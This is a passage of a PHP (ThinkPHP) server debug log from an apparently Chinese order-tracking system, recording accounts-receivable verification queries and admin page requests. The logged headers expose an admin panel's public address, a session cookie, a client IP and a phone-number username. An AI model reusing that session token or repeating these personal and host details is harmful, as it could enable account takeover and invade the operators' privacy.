`day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53600 , 1072 , 11830 , 27825 , 1 , 2025 , 12 , 14 , '320W-9上盖8712个' , 1765702202 , 12196.8 , 10850815.390661) [ RunTime:0.004643s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5676,`price`=3.2,`money`=18163.2 WHERE `id` = 27826 [ RunTime:0.006536s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000620s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53601 , 1083 , 11830 , 27826 , 1 , 2025 , 12 , 14 , '200W-9底壳5676个' , 1765702202 , 18163.2 , 10868978.590661) [ RunTime:0.004282s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5676,`price`=1.2,`money`=6811.2 WHERE `id` = 27827 [ RunTime:0.005169s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000382s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53602 , 1079 , 11830 , 27827 , 1 , 2025 , 12 , 14 , '200w-8风机孔5676个' , 1765702202 , 6811.2 , 10875789.790661) [ RunTime:0.004650s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3072,`price`=9.1,`money`=27955.2 WHERE `id` = 27828 [ RunTime:0.005722s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000551s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53603 , 1150 , 11830 , 27828 , 1 , 2025 , 12 , 14 , '400W-1底壳3072个' , 1765702202 , 27955.2 , 10903744.990661) [ RunTime:0.005466s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3072,`price`=2.2,`money`=6758.4 WHERE `id` = 27829 [ RunTime:0.007219s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000481s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53604 , 1151 , 11830 , 27829 , 1 , 2025 , 12 , 14 , '400W-1上盖3072个' , 1765702202 , 6758.4 , 10910503.390661) [ RunTime:0.005308s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3072,`price`=2.2,`money`=6758.4 WHERE `id` = 27830 [ RunTime:0.004950s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000466s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53606 , 1065 , 11830 , 27830 , 1 , 2025 , 12 , 14 , '400W-1平散热器3072个' , 1765702202 , 6758.4 , 10917261.790661) [ RunTime:0.005887s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000793s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u7a0b\",\"158\"],\"verify_amount\":[\"8712\",\"8712\",\"5676\",\"5676\",\"3072\",\"3072\",\"3072\"],\"price\":[\"4.9\",\"1.4000000000\",\"3.2\",\"1.2000000000\",\"9.1\",\"2.2000000000\",\"2.2000000000\"],\"money\":[\"42688.8\",\"12196.8000000000\",\"18163.2\",\"6811.2000000000\",\"27955.199999999997\",\"6758.4000000000\",\"6758.4000000000\"],\"explain\":[\"320W-15\\u5e95\\u58f38712\\u4e2a\",\"320W-9\\u4e0a\\u76d68712\\u4e2a\",\"200W-9\\u5e95\\u58f35676\\u4e2a\",\"200w-8\\u98ce\\u673a\\u5b545676\\u4e2a\",\"400W-1\\u5e95\\u58f33072\\u4e2a\",\"400W-1\\u4e0a\\u76d63072\\u4e2a\",\"400W-1\\u5e73\\u6563\\u70ed\\u56683072\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"shoukuan_status-5\":\"0\",\"shoukuan_status-6\":\"0\",\"shoukuan_status-7\":\"0\",\"ids\":\"11830\"}' , '/admin/financial/verifybill/hedui/ids/11830?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702202) [ RunTime:0.003632s ] --------------------------------------------------------------- [ 2025-12-14T16:50:03+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970985 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970985 [运行时间:0.268469s][吞吐率:3.72req/s] [内存消耗:5,706.61kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001175s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970985', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001666s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000137s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000550s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000769s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000447s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000577s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001115s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000983s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000422s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000665s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000624s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000626s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.023845s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.023532s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11829 [ RunTime:0.015144s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11828 [ RunTime:0.015241s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11827 [ RunTime:0.015123s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.014955s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.015088s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014953s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014987s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014879s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014972s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014710s ] --------------------------------------------------------------- [ 2025-12-14T16:50:04+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11829?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11829?dialog=1 [运行时间:0.082905s][吞吐率:12.06req/s] [内存消耗:6,461.70kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001251s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11829', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001586s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000125s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000509s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000754s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000446s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000595s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001018s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000805s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000281s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000838s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000930s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000669s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000763s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000709s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11829' [ RunTime:0.014694s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1080 LIMIT 1 [ RunTime:0.000372s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1074 LIMIT 1 [ RunTime:0.000305s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1103 LIMIT 1 [ RunTime:0.000277s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1104 LIMIT 1 [ RunTime:0.000266s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1120 LIMIT 1 [ RunTime:0.000562s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1123 LIMIT 1 [ RunTime:0.000373s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11829 LIMIT 1 [ RunTime:0.000371s ] --------------------------------------------------------------- [ 2025-12-14T16:50:04+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702204 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702204 [运行时间:0.034018s][吞吐率:29.40req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11829?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702204', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001606s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run 